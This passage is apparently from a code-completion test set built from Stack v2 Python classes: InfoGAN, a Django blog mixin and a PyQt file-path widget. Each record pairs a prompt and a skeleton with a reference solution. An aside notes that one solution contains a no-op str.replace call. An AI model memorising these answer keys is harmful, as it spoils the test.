self.lambda_cont = lambda_cont\n self.generator.apply(weights_init_normal)\n self.discriminator.apply(weights_init_normal)\n\n def forward(self, imgs, labels=None, z=None, code=None):\n \"\"\"Forwards a single set of batches through the network Parameters ---------- imgs : :class:`torch.Tensor` the image batch labels : :class:`torch.Tensor` the labels batch, will be sampled if not given z : :class:`torch.Tensor` the noise batch, will be sampled if not given code : :class:`torch.Tensor` the code batch, will be sampled if not given Returns ------- dict a dictionary containing all (intermediate) results for loss calculation and training\"\"\"\n if z is None:\n z = torch.randn(imgs.size(0), self._latent_dim, device=imgs.device, dtype=imgs.dtype)\n if labels is None:\n labels = torch.randint(self._n_classes, (imgs.size(0), 1), device=imgs.device, dtype=torch.long)\n if labels.size(-1) != self._n_classes:\n labels = one_hot_batch(labels.unsqueeze(1), num_classes=self._n_classes)\n if code is None:\n code = torch.empty(imgs.size(0), self._code_dim, device=imgs.device, dtype=imgs.dtype)\n code.uniform_(-1, 1)\n gen_imgs = self.generator(z, labels, code)\n validity_real, _, _ = self.discriminator(imgs)\n validity_fake, labels_fake, code_fake = self.discriminator(gen_imgs)\n return {'validity_real': validity_real, 'validity_fake': validity_fake, 'labels_real': labels, 'labels_fake': labels_fake, 'code_real': code, 'code_fake': code_fake, 'gen_imgs': gen_imgs}\n", "source": "the_stack_v2_python_sparse", "source_path": "dlutils/models/gans/info/info_gan.py", "source_repo": "justusschock/dl-utils", "split": "test", "star_events_count": 15} {"blob_id": "8b3aaf3bd64ee5974784f01d2050272f652f9b50", "bodies": ["archive = models.Entry.objects.filter(is_published=True).order_by('-pub_date')\nif not archive:\n return {'list': archive, 'display_year': None, 'display_month': None}\nif display_year is None and display_month is None:\n display_year, display_month = (archive[0].pub_date.year, archive[0].pub_date.month)\nelif display_year is not None and display_month is None:\n display_month = archive.filter(pub_date__year=display_year).order_by('-pub_date')[0].pub_date.month\nreturn {'list': archive, 'display_year': display_year, 'display_month': display_month}", "data = 
models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).aggregate(mode=Mode('num_entries'), mean=Avg('num_entries'), std_dev=StdDev('num_entries'))\nmode, mean, std_dev = (data['mode'], data['mean'], data['std_dev'])\nif not mode and (not mean) and (not std_dev):\n return []\nreturn models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).annotate(category=Case(When(num_entries__gt=mean + std_dev, then=Value('upper')), When(num_entries__lt=mean - std_dev, then=Value('lower')), default=Value('avg'), output_field=CharField()))", "if not query_set:\n return (query_set, None, None, 0)\ntotal = query_set.count()\ntotal_pages, orphans = divmod(total, self.max_per_page)\nstart_elem = (page - 1) * self.max_per_page\nremaining = total - (page - 1) * self.max_per_page\nif remaining >= self.max_per_page + self.pagination_orphans:\n query_set, next_page, prev_page = (query_set[start_elem:start_elem + self.max_per_page], page + 1, page - 1 if page > 1 else None)\nelse:\n query_set, next_page, prev_page = (query_set[start_elem:], None, page - 1 if page > 1 else None)\nreturn (query_set, prev_page, next_page, total_pages if orphans < self.pagination_orphans else total_pages + 1)"], "bodies_text": "<|body_start_0|>\n archive = models.Entry.objects.filter(is_published=True).order_by('-pub_date')\n if not archive:\n return {'list': archive, 'display_year': None, 'display_month': None}\n if display_year is None and display_month is None:\n display_year, display_month = (archive[0].pub_date.year, archive[0].pub_date.month)\n elif display_year is not None and display_month is None:\n display_month = archive.filter(pub_date__year=display_year).order_by('-pub_date')[0].pub_date.month\n return {'list': archive, 'display_year': display_year, 'display_month': display_month}\n<|end_body_0|>\n\n<|body_start_1|>\n data = models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).aggregate(mode=Mode('num_entries'), mean=Avg('num_entries'), std_dev=StdDev('num_entries'))\n mode, mean, std_dev = (data['mode'], data['mean'], data['std_dev'])\n if not mode and (not mean) and (not std_dev):\n return []\n return models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).annotate(category=Case(When(num_entries__gt=mean + std_dev, then=Value('upper')), When(num_entries__lt=mean - std_dev, then=Value('lower')), default=Value('avg'), output_field=CharField()))\n<|end_body_1|>\n\n<|body_start_2|>\n if not query_set:\n return (query_set, None, None, 0)\n total = query_set.count()\n total_pages, orphans = divmod(total, self.max_per_page)\n start_elem = (page - 1) * self.max_per_page\n remaining = total - (page - 1) * self.max_per_page\n if remaining >= self.max_per_page + self.pagination_orphans:\n query_set, next_page, prev_page = (query_set[start_elem:start_elem + self.max_per_page], page + 1, page - 1 if page > 1 else None)\n else:\n query_set, next_page, prev_page = (query_set[start_elem:], None, page - 1 if page > 1 else None)\n return (query_set, prev_page, next_page, total_pages if orphans < self.pagination_orphans else total_pages + 1)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "BlogMixin", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BlogMixin:\n\n def get_archive(request, display_year=None, display_month=None):\n \"\"\"Generate a query set which list which provides a calendarised archive :param request : The WSGI request which triggers 
this archive display, used to identify if draft documents should be displayed. :param display_year : The year (integer or None) which should be opened by default when this archive is displayed :param display_month : The month (integer or None) which should be opened by default when this archive is displayed\"\"\"\n <|body_0|>\n\n def get_tag_cloud():\n \"\"\"Fetch the tag cloud data - categorise the Tags as upper, Average or lower Categorisation based on whether they are above or below average (mean) Maybe better to use MODE - i.e. the most frequent count. Using mode ensures that the largest number of labels are in the 'average' category\"\"\"\n <|body_1|>\n\n def pagination(self, query_set, page, url_args):\n \"\"\"Split the query set into pages based on the instance paging attributes :param query_set : The fully ordered query set of all the posts filtered by Tag or date :param page : The page being requested :param url_args : The set of arguments required to create the url :return A tuple of the query_set, the url for the previous page, and a url for the next page\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n archive = models.Entry.objects.filter(is_published=True).order_by('-pub_date')\n if not archive:\n return {'list': archive, 'display_year': None, 'display_month': None}\n if display_year is None and display_month is None:\n display_year, display_month = (archive[0].pub_date.year, archive[0].pub_date.month)\n elif display_year is not None and display_month is None:\n display_month = archive.filter(pub_date__year=display_year).order_by('-pub_date')[0].pub_date.month\n return {'list': archive, 'display_year': display_year, 'display_month': display_month}\n<|end_body_0|>\n\n<|body_start_1|>\n data = models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).aggregate(mode=Mode('num_entries'), mean=Avg('num_entries'), std_dev=StdDev('num_entries'))\n mode, mean, std_dev = (data['mode'], data['mean'], data['std_dev'])\n if not mode and (not mean) and (not std_dev):\n return []\n return models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).annotate(category=Case(When(num_entries__gt=mean + std_dev, then=Value('upper')), When(num_entries__lt=mean - std_dev, then=Value('lower')), default=Value('avg'), output_field=CharField()))\n<|end_body_1|>\n\n<|body_start_2|>\n if not query_set:\n return (query_set, None, None, 0)\n total = query_set.count()\n total_pages, orphans = divmod(total, self.max_per_page)\n start_elem = (page - 1) * self.max_per_page\n remaining = total - (page - 1) * self.max_per_page\n if remaining >= self.max_per_page + self.pagination_orphans:\n query_set, next_page, prev_page = (query_set[start_elem:start_elem + self.max_per_page], page + 1, page - 1 if page > 1 else None)\n else:\n query_set, next_page, prev_page = (query_set[start_elem:], None, page - 1 if page > 1 else None)\n return (query_set, prev_page, next_page, total_pages if orphans < self.pagination_orphans else total_pages + 1)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000186", "length_bytes": 7485, "license_type": "no_license", "methods": [{"docstring": "Generate a query set which list which provides a calendarised archive :param request : The WSGI request which triggers this archive display, used to identify if draft documents should be displayed. 
:param display_year : The year (integer or None) which should be opened by default when this archive is displayed :param display_month : The month (integer or None) which should be opened by default when this archive is displayed", "name": "get_archive", "signature": "def get_archive(request, display_year=None, display_month=None)"}, {"docstring": "Fetch the tag cloud data - categorise the Tags as upper, Average or lower Categorisation based on whether they are above or below average (mean) Maybe better to use MODE - i.e. the most frequent count. Using mode ensures that the largest number of labels are in the 'average' category", "name": "get_tag_cloud", "signature": "def get_tag_cloud()"}, {"docstring": "Split the query set into pages based on the instance paging attributes :param query_set : The fully ordered query set of all the posts filtered by Tag or date :param page : The page being requested :param url_args : The set of arguments required to create the url :return A tuple of the query_set, the url for the previous page, and a url for the next page", "name": "pagination", "signature": "def pagination(self, query_set, page, url_args)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002039", "prompt": "Implement the Python class `BlogMixin` described below.\n\nClass description:\nImplement the BlogMixin class.\n\nMethod signatures and docstrings:\n- def get_archive(request, display_year=None, display_month=None): Generate a query set which list which provides a calendarised archive :param request : The WSGI request which triggers this archive display, used to identify if draft documents should be displayed. :param display_year : The year (integer or None) which should be opened by default when this archive is displayed :param display_month : The month (integer or None) which should be opened by default when this archive is displayed\n- def get_tag_cloud(): Fetch the tag cloud data - categorise the Tags as upper, Average or lower Categorisation based on whether they are above or below average (mean) Maybe better to use MODE - i.e. the most frequent count. Using mode ensures that the largest number of labels are in the 'average' category\n- def pagination(self, query_set, page, url_args): Split the query set into pages based on the instance paging attributes :param query_set : The fully ordered query set of all the posts filtered by Tag or date :param page : The page being requested :param url_args : The set of arguments required to create the url :return A tuple of the query_set, the url for the previous page, and a url for the next page", "prompted_full_text": "Implement the Python class `BlogMixin` described below.\n\nClass description:\nImplement the BlogMixin class.\n\nMethod signatures and docstrings:\n- def get_archive(request, display_year=None, display_month=None): Generate a query set which list which provides a calendarised archive :param request : The WSGI request which triggers this archive display, used to identify if draft documents should be displayed. :param display_year : The year (integer or None) which should be opened by default when this archive is displayed :param display_month : The month (integer or None) which should be opened by default when this archive is displayed\n- def get_tag_cloud(): Fetch the tag cloud data - categorise the Tags as upper, Average or lower Categorisation based on whether they are above or below average (mean) Maybe better to use MODE - i.e. the most frequent count. 
Using mode ensures that the largest number of labels are in the 'average' category\n- def pagination(self, query_set, page, url_args): Split the query set into pages based on the instance paging attributes :param query_set : The fully ordered query set of all the posts filtered by Tag or date :param page : The page being requested :param url_args : The set of arguments required to create the url :return A tuple of the query_set, the url for the previous page, and a url for the next page\n\n<|skeleton|>\nclass BlogMixin:\n\n def get_archive(request, display_year=None, display_month=None):\n \"\"\"Generate a query set which list which provides a calendarised archive :param request : The WSGI request which triggers this archive display, used to identify if draft documents should be displayed. :param display_year : The year (integer or None) which should be opened by default when this archive is displayed :param display_month : The month (integer or None) which should be opened by default when this archive is displayed\"\"\"\n <|body_0|>\n\n def get_tag_cloud():\n \"\"\"Fetch the tag cloud data - categorise the Tags as upper, Average or lower Categorisation based on whether they are above or below average (mean) Maybe better to use MODE - i.e. the most frequent count. Using mode ensures that the largest number of labels are in the 'average' category\"\"\"\n <|body_1|>\n\n def pagination(self, query_set, page, url_args):\n \"\"\"Split the query set into pages based on the instance paging attributes :param query_set : The fully ordered query set of all the posts filtered by Tag or date :param page : The page being requested :param url_args : The set of arguments required to create the url :return A tuple of the query_set, the url for the previous page, and a url for the next page\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n archive = models.Entry.objects.filter(is_published=True).order_by('-pub_date')\n if not archive:\n return {'list': archive, 'display_year': None, 'display_month': None}\n if display_year is None and display_month is None:\n display_year, display_month = (archive[0].pub_date.year, archive[0].pub_date.month)\n elif display_year is not None and display_month is None:\n display_month = archive.filter(pub_date__year=display_year).order_by('-pub_date')[0].pub_date.month\n return {'list': archive, 'display_year': display_year, 'display_month': display_month}\n<|end_body_0|>\n\n<|body_start_1|>\n data = models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).aggregate(mode=Mode('num_entries'), mean=Avg('num_entries'), std_dev=StdDev('num_entries'))\n mode, mean, std_dev = (data['mode'], data['mean'], data['std_dev'])\n if not mode and (not mean) and (not std_dev):\n return []\n return models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).annotate(category=Case(When(num_entries__gt=mean + std_dev, then=Value('upper')), When(num_entries__lt=mean - std_dev, then=Value('lower')), default=Value('avg'), output_field=CharField()))\n<|end_body_1|>\n\n<|body_start_2|>\n if not query_set:\n return (query_set, None, None, 0)\n total = query_set.count()\n total_pages, orphans = divmod(total, self.max_per_page)\n start_elem = (page - 1) * self.max_per_page\n remaining = total - (page - 1) * self.max_per_page\n if remaining >= self.max_per_page + self.pagination_orphans:\n query_set, next_page, prev_page = (query_set[start_elem:start_elem + self.max_per_page], page + 1, page - 1 if page > 1 else None)\n else:\n query_set, 
next_page, prev_page = (query_set[start_elem:], None, page - 1 if page > 1 else None)\n return (query_set, prev_page, next_page, total_pages if orphans < self.pagination_orphans else total_pages + 1)\n<|end_body_2|>\n", "revision_id": "3379c5d5f2105a2cefc63ca6a5bf2bc3b995a8a3", "skeleton": "<|skeleton|>\nclass BlogMixin:\n\n def get_archive(request, display_year=None, display_month=None):\n \"\"\"Generate a query set which list which provides a calendarised archive :param request : The WSGI request which triggers this archive display, used to identify if draft documents should be displayed. :param display_year : The year (integer or None) which should be opened by default when this archive is displayed :param display_month : The month (integer or None) which should be opened by default when this archive is displayed\"\"\"\n <|body_0|>\n\n def get_tag_cloud():\n \"\"\"Fetch the tag cloud data - categorise the Tags as upper, Average or lower Categorisation based on whether they are above or below average (mean) Maybe better to use MODE - i.e. the most frequent count. Using mode ensures that the largest number of labels are in the 'average' category\"\"\"\n <|body_1|>\n\n def pagination(self, query_set, page, url_args):\n \"\"\"Split the query set into pages based on the instance paging attributes :param query_set : The fully ordered query set of all the posts filtered by Tag or date :param page : The page being requested :param url_args : The set of arguments required to create the url :return A tuple of the query_set, the url for the previous page, and a url for the next page\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BlogMixin:\n def get_archive(request, display_year=None, display_month=None):\n \"\"\"Generate a query set which list which provides a calendarised archive :param request : The WSGI request which triggers this archive display, used to identify if draft documents should be displayed. :param display_year : The year (integer or None) which should be opened by default when this archive is displayed :param display_month : The month (integer or None) which should be opened by default when this archive is displayed\"\"\"\n archive = models.Entry.objects.filter(is_published=True).order_by('-pub_date')\n if not archive:\n return {'list': archive, 'display_year': None, 'display_month': None}\n if display_year is None and display_month is None:\n display_year, display_month = (archive[0].pub_date.year, archive[0].pub_date.month)\n elif display_year is not None and display_month is None:\n display_month = archive.filter(pub_date__year=display_year).order_by('-pub_date')[0].pub_date.month\n return {'list': archive, 'display_year': display_year, 'display_month': display_month}\n\n def get_tag_cloud():\n \"\"\"Fetch the tag cloud data - categorise the Tags as upper, Average or lower Categorisation based on whether they are above or below average (mean) Maybe better to use MODE - i.e. the most frequent count. 
Using mode ensures that the largest number of labels are in the 'average' category\"\"\"\n data = models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).aggregate(mode=Mode('num_entries'), mean=Avg('num_entries'), std_dev=StdDev('num_entries'))\n mode, mean, std_dev = (data['mode'], data['mean'], data['std_dev'])\n if not mode and (not mean) and (not std_dev):\n return []\n return models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).annotate(category=Case(When(num_entries__gt=mean + std_dev, then=Value('upper')), When(num_entries__lt=mean - std_dev, then=Value('lower')), default=Value('avg'), output_field=CharField()))\n\n def pagination(self, query_set, page, url_args):\n \"\"\"Split the query set into pages based on the instance paging attributes :param query_set : The fully ordered query set of all the posts filtered by Tag or date :param page : The page being requested :param url_args : The set of arguments required to create the url :return A tuple of the query_set, the url for the previous page, and a url for the next page\"\"\"\n if not query_set:\n return (query_set, None, None, 0)\n total = query_set.count()\n total_pages, orphans = divmod(total, self.max_per_page)\n start_elem = (page - 1) * self.max_per_page\n remaining = total - (page - 1) * self.max_per_page\n if remaining >= self.max_per_page + self.pagination_orphans:\n query_set, next_page, prev_page = (query_set[start_elem:start_elem + self.max_per_page], page + 1, page - 1 if page > 1 else None)\n else:\n query_set, next_page, prev_page = (query_set[start_elem:], None, page - 1 if page > 1 else None)\n return (query_set, prev_page, next_page, total_pages if orphans < self.pagination_orphans else total_pages + 1)\n", "source": "the_stack_v2_python_sparse", "source_path": "blog/views.py", "source_repo": "TonyFlury/SuffolkCycleDjango", "split": "test", "star_events_count": 0} {"blob_id": "debb8c7fa0fc9beed61de76179ac1bfcbcf14668", "bodies": ["super(PanelFilePath, self).__init__(window_file_panel.tab_widget)\nself.window_file_panel = window_file_panel\nself.setup_file_path_ui()\nself.setup_connections()", "self.path_layout = QtGui.QHBoxLayout(self)\nself.path_layout.setMargin(0)\nself.path_layout.setSpacing(0)\nself.path_line_edit = PanelDoubleClickPath(self)\nself.path_line_edit.setReadOnly(True)\nself.path_layout.addWidget(self.path_line_edit)\nself.push_up_dir = QtGui.QPushButton(self)\nself.push_up_dir.setToolTip('Go up folder')\nself.push_up_dir.setIcon(QtGui.QIcon('resources/icon/cdtoparent.png'))\nself.push_up_dir.setIconSize(QtCore.QSize(24, 24))\nself.path_layout.addWidget(self.push_up_dir)", "self.push_up_dir.clicked.connect(self.goto_parent_clicked_connection)\nself.path_line_edit.returnPressed.connect(self.update_file_path_connection)\nself.connect(self.window_file_panel.tree_view, QtCore.SIGNAL('backspacePressed'), self.goto_parent_clicked_connection)", "if self.window_file_panel.current_folder_name != '':\n parent_index = self.window_file_panel.tree_view.model.index(self.window_file_panel.current_folder_path)\n folder_index = self.window_file_panel.tree_view.model.parent(parent_index)\n self.window_file_panel.goto_folder(folder_index)", "edit_path = str(self.path_line_edit.text())\nif os.path.exists(edit_path):\n edit_path.replace('/', '//')\n self.window_file_panel.goto_folder(self.window_file_panel.tree_view.model.index(edit_path))\n self.path_line_edit.setReadOnly(True)"], "bodies_text": "<|body_start_0|>\n super(PanelFilePath, 
self).__init__(window_file_panel.tab_widget)\n self.window_file_panel = window_file_panel\n self.setup_file_path_ui()\n self.setup_connections()\n<|end_body_0|>\n\n<|body_start_1|>\n self.path_layout = QtGui.QHBoxLayout(self)\n self.path_layout.setMargin(0)\n self.path_layout.setSpacing(0)\n self.path_line_edit = PanelDoubleClickPath(self)\n self.path_line_edit.setReadOnly(True)\n self.path_layout.addWidget(self.path_line_edit)\n self.push_up_dir = QtGui.QPushButton(self)\n self.push_up_dir.setToolTip('Go up folder')\n self.push_up_dir.setIcon(QtGui.QIcon('resources/icon/cdtoparent.png'))\n self.push_up_dir.setIconSize(QtCore.QSize(24, 24))\n self.path_layout.addWidget(self.push_up_dir)\n<|end_body_1|>\n\n<|body_start_2|>\n self.push_up_dir.clicked.connect(self.goto_parent_clicked_connection)\n self.path_line_edit.returnPressed.connect(self.update_file_path_connection)\n self.connect(self.window_file_panel.tree_view, QtCore.SIGNAL('backspacePressed'), self.goto_parent_clicked_connection)\n<|end_body_2|>\n\n<|body_start_3|>\n if self.window_file_panel.current_folder_name != '':\n parent_index = self.window_file_panel.tree_view.model.index(self.window_file_panel.current_folder_path)\n folder_index = self.window_file_panel.tree_view.model.parent(parent_index)\n self.window_file_panel.goto_folder(folder_index)\n<|end_body_3|>\n\n<|body_start_4|>\n edit_path = str(self.path_line_edit.text())\n if os.path.exists(edit_path):\n edit_path.replace('/', '//')\n self.window_file_panel.goto_folder(self.window_file_panel.tree_view.model.index(edit_path))\n self.path_line_edit.setReadOnly(True)\n<|end_body_4|>\n", "class_docstring": "", "class_name": "PanelFilePath", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PanelFilePath:\n\n def __init__(self, window_file_panel):\n \"\"\"constructor initializes a widget with a edit line and button to be put on WindowFilePanel. 
Keyword arguments: :param window_file_panel: an initialized instance (parent widget) of WindowFilePanel class\"\"\"\n <|body_0|>\n\n def setup_file_path_ui(self):\n \"\"\"setup path file elements including go to parent button used only from constructor\"\"\"\n <|body_1|>\n\n def setup_connections(self):\n \"\"\"setup path and go to parent button connections used only from constructor\"\"\"\n <|body_2|>\n\n def goto_parent_clicked_connection(self):\n \"\"\"This connection visually goes to parent folder from current folder\"\"\"\n <|body_3|>\n\n def update_file_path_connection(self):\n \"\"\"This connection visually goes to written path in the path field\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(PanelFilePath, self).__init__(window_file_panel.tab_widget)\n self.window_file_panel = window_file_panel\n self.setup_file_path_ui()\n self.setup_connections()\n<|end_body_0|>\n\n<|body_start_1|>\n self.path_layout = QtGui.QHBoxLayout(self)\n self.path_layout.setMargin(0)\n self.path_layout.setSpacing(0)\n self.path_line_edit = PanelDoubleClickPath(self)\n self.path_line_edit.setReadOnly(True)\n self.path_layout.addWidget(self.path_line_edit)\n self.push_up_dir = QtGui.QPushButton(self)\n self.push_up_dir.setToolTip('Go up folder')\n self.push_up_dir.setIcon(QtGui.QIcon('resources/icon/cdtoparent.png'))\n self.push_up_dir.setIconSize(QtCore.QSize(24, 24))\n self.path_layout.addWidget(self.push_up_dir)\n<|end_body_1|>\n\n<|body_start_2|>\n self.push_up_dir.clicked.connect(self.goto_parent_clicked_connection)\n self.path_line_edit.returnPressed.connect(self.update_file_path_connection)\n self.connect(self.window_file_panel.tree_view, QtCore.SIGNAL('backspacePressed'), self.goto_parent_clicked_connection)\n<|end_body_2|>\n\n<|body_start_3|>\n if self.window_file_panel.current_folder_name != '':\n parent_index = self.window_file_panel.tree_view.model.index(self.window_file_panel.current_folder_path)\n folder_index = self.window_file_panel.tree_view.model.parent(parent_index)\n self.window_file_panel.goto_folder(folder_index)\n<|end_body_3|>\n\n<|body_start_4|>\n edit_path = str(self.path_line_edit.text())\n if os.path.exists(edit_path):\n edit_path.replace('/', '//')\n self.window_file_panel.goto_folder(self.window_file_panel.tree_view.model.index(edit_path))\n self.path_line_edit.setReadOnly(True)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000187", "length_bytes": 2909, "license_type": "no_license", "methods": [{"docstring": "constructor initializes a widget with a edit line and button to be put on WindowFilePanel. 
Keyword arguments: :param window_file_panel: an initialized instance (parent widget) of WindowFilePanel class", "name": "__init__", "signature": "def __init__(self, window_file_panel)"}, {"docstring": "setup path file elements including go to parent button used only from constructor", "name": "setup_file_path_ui", "signature": "def setup_file_path_ui(self)"}, {"docstring": "setup path and go to parent button connections used only from constructor", "name": "setup_connections", "signature": "def setup_connections(self)"}, {"docstring": "This connection visually goes to parent folder from current folder", "name": "goto_parent_clicked_connection", "signature": "def goto_parent_clicked_connection(self)"}, {"docstring": "This connection visually goes to written path in the path field", "name": "update_file_path_connection", "signature": "def update_file_path_connection(self)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_004476", "prompt": "Implement the Python class `PanelFilePath` described below.\n\nClass description:\nImplement the PanelFilePath class.\n\nMethod signatures and docstrings:\n- def __init__(self, window_file_panel): constructor initializes a widget with a edit line and button to be put on WindowFilePanel. Keyword arguments: :param window_file_panel: an initialized instance (parent widget) of WindowFilePanel class\n- def setup_file_path_ui(self): setup path file elements including go to parent button used only from constructor\n- def setup_connections(self): setup path and go to parent button connections used only from constructor\n- def goto_parent_clicked_connection(self): This connection visually goes to parent folder from current folder\n- def update_file_path_connection(self): This connection visually goes to written path in the path field", "prompted_full_text": "Implement the Python class `PanelFilePath` described below.\n\nClass description:\nImplement the PanelFilePath class.\n\nMethod signatures and docstrings:\n- def __init__(self, window_file_panel): constructor initializes a widget with a edit line and button to be put on WindowFilePanel. Keyword arguments: :param window_file_panel: an initialized instance (parent widget) of WindowFilePanel class\n- def setup_file_path_ui(self): setup path file elements including go to parent button used only from constructor\n- def setup_connections(self): setup path and go to parent button connections used only from constructor\n- def goto_parent_clicked_connection(self): This connection visually goes to parent folder from current folder\n- def update_file_path_connection(self): This connection visually goes to written path in the path field\n\n<|skeleton|>\nclass PanelFilePath:\n\n def __init__(self, window_file_panel):\n \"\"\"constructor initializes a widget with a edit line and button to be put on WindowFilePanel. 
Keyword arguments: :param window_file_panel: an initialized instance (parent widget) of WindowFilePanel class\"\"\"\n <|body_0|>\n\n def setup_file_path_ui(self):\n \"\"\"setup path file elements including go to parent button used only from constructor\"\"\"\n <|body_1|>\n\n def setup_connections(self):\n \"\"\"setup path and go to parent button connections used only from constructor\"\"\"\n <|body_2|>\n\n def goto_parent_clicked_connection(self):\n \"\"\"This connection visually goes to parent folder from current folder\"\"\"\n <|body_3|>\n\n def update_file_path_connection(self):\n \"\"\"This connection visually goes to written path in the path field\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(PanelFilePath, self).__init__(window_file_panel.tab_widget)\n self.window_file_panel = window_file_panel\n self.setup_file_path_ui()\n self.setup_connections()\n<|end_body_0|>\n\n<|body_start_1|>\n self.path_layout = QtGui.QHBoxLayout(self)\n self.path_layout.setMargin(0)\n self.path_layout.setSpacing(0)\n self.path_line_edit = PanelDoubleClickPath(self)\n self.path_line_edit.setReadOnly(True)\n self.path_layout.addWidget(self.path_line_edit)\n self.push_up_dir = QtGui.QPushButton(self)\n self.push_up_dir.setToolTip('Go up folder')\n self.push_up_dir.setIcon(QtGui.QIcon('resources/icon/cdtoparent.png'))\n self.push_up_dir.setIconSize(QtCore.QSize(24, 24))\n self.path_layout.addWidget(self.push_up_dir)\n<|end_body_1|>\n\n<|body_start_2|>\n self.push_up_dir.clicked.connect(self.goto_parent_clicked_connection)\n self.path_line_edit.returnPressed.connect(self.update_file_path_connection)\n self.connect(self.window_file_panel.tree_view, QtCore.SIGNAL('backspacePressed'), self.goto_parent_clicked_connection)\n<|end_body_2|>\n\n<|body_start_3|>\n if self.window_file_panel.current_folder_name != '':\n parent_index = self.window_file_panel.tree_view.model.index(self.window_file_panel.current_folder_path)\n folder_index = self.window_file_panel.tree_view.model.parent(parent_index)\n self.window_file_panel.goto_folder(folder_index)\n<|end_body_3|>\n\n<|body_start_4|>\n edit_path = str(self.path_line_edit.text())\n if os.path.exists(edit_path):\n edit_path.replace('/', '//')\n self.window_file_panel.goto_folder(self.window_file_panel.tree_view.model.index(edit_path))\n self.path_line_edit.setReadOnly(True)\n<|end_body_4|>\n", "revision_id": "5f7ab5b39c1dc7d8d2182048c5d8eaff04de3d06", "skeleton": "<|skeleton|>\nclass PanelFilePath:\n\n def __init__(self, window_file_panel):\n \"\"\"constructor initializes a widget with a edit line and button to be put on WindowFilePanel. 
Keyword arguments: :param window_file_panel: an initialized instance (parent widget) of WindowFilePanel class\"\"\"\n <|body_0|>\n\n def setup_file_path_ui(self):\n \"\"\"setup path file elements including go to parent button used only from constructor\"\"\"\n <|body_1|>\n\n def setup_connections(self):\n \"\"\"setup path and go to parent button connections used only from constructor\"\"\"\n <|body_2|>\n\n def goto_parent_clicked_connection(self):\n \"\"\"This connection visually goes to parent folder from current folder\"\"\"\n <|body_3|>\n\n def update_file_path_connection(self):\n \"\"\"This connection visually goes to written path in the path field\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PanelFilePath:\n def __init__(self, window_file_panel):\n \"\"\"constructor initializes a widget with a edit line and button to be put on WindowFilePanel. Keyword arguments: :param window_file_panel: an initialized instance (parent widget) of WindowFilePanel class\"\"\"\n super(PanelFilePath, self).__init__(window_file_panel.tab_widget)\n self.window_file_panel = window_file_panel\n self.setup_file_path_ui()\n self.setup_connections()\n\n def setup_file_path_ui(self):\n \"\"\"setup path file elements including go to parent button used only from constructor\"\"\"\n self.path_layout = QtGui.QHBoxLayout(self)\n self.path_layout.setMargin(0)\n self.path_layout.setSpacing(0)\n self.path_line_edit = PanelDoubleClickPath(self)\n self.path_line_edit.setReadOnly(True)\n self.path_layout.addWidget(self.path_line_edit)\n self.push_up_dir = QtGui.QPushButton(self)\n self.push_up_dir.setToolTip('Go up folder')\n self.push_up_dir.setIcon(QtGui.QIcon('resources/icon/cdtoparent.png'))\n self.push_up_dir.setIconSize(QtCore.QSize(24, 24))\n self.path_layout.addWidget(self.push_up_dir)\n\n def setup_connections(self):\n \"\"\"setup path and go to parent button connections used only from constructor\"\"\"\n self.push_up_dir.clicked.connect(self.goto_parent_clicked_connection)\n self.path_line_edit.returnPressed.connect(self.update_file_path_connection)\n self.connect(self.window_file_panel.tree_view, QtCore.SIGNAL('backspacePressed'), self.goto_parent_clicked_connection)\n\n def goto_parent_clicked_connection(self):\n \"\"\"This connection visually goes to parent folder from current folder\"\"\"\n if self.window_file_panel.current_folder_name != '':\n parent_index = self.window_file_panel.tree_view.model.index(self.window_file_panel.current_folder_path)\n folder_index = self.window_file_panel.tree_view.model.parent(parent_index)\n self.window_file_panel.goto_folder(folder_index)\n\n def update_file_path_connection(self):\n \"\"\"This connection visually goes to written path in the path field\"\"\"\n edit_path = str(self.path_line_edit.text())\n if os.path.exists(edit_path):\n edit_path.replace('/', '//')\n self.window_file_panel.goto_folder(self.window_file_panel.tree_view.model.index(edit_path))\n self.path_line_edit.setReadOnly(True)\n", "source": "the_stack_v2_python_sparse", "source_path": "views/window/filepanel/panel_file_path.py", "source_repo": "jafi666/pyCommander", "split": "test", "star_events_count": 0} {"blob_id": "2de27d0e7d6c9c9d98a7cd60b719b7a481c87feb", "bodies": ["self.uuid = str(uuid4())\nself.wf_meta = {'wf_uuid': self.uuid, 'wf_name': self.__class__.__name__, 'wf_version': __version__}\nordered_structures = [s for _, s in sorted(zip(energies, magnetic_structures), 
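[Editor's aside, not part of the records] The `update_file_path_connection` body stored in the PanelFilePath record above contains a classic Python pitfall: `edit_path.replace('/', '//')` discards its result, because `str.replace` returns a new string (Python strings are immutable), so the call as written is a no-op. A minimal, framework-free sketch of what that line appears to intend; the function name is illustrative, and whether doubled slashes were actually the goal is an assumption:

import os

def normalize_edit_path(edit_path):
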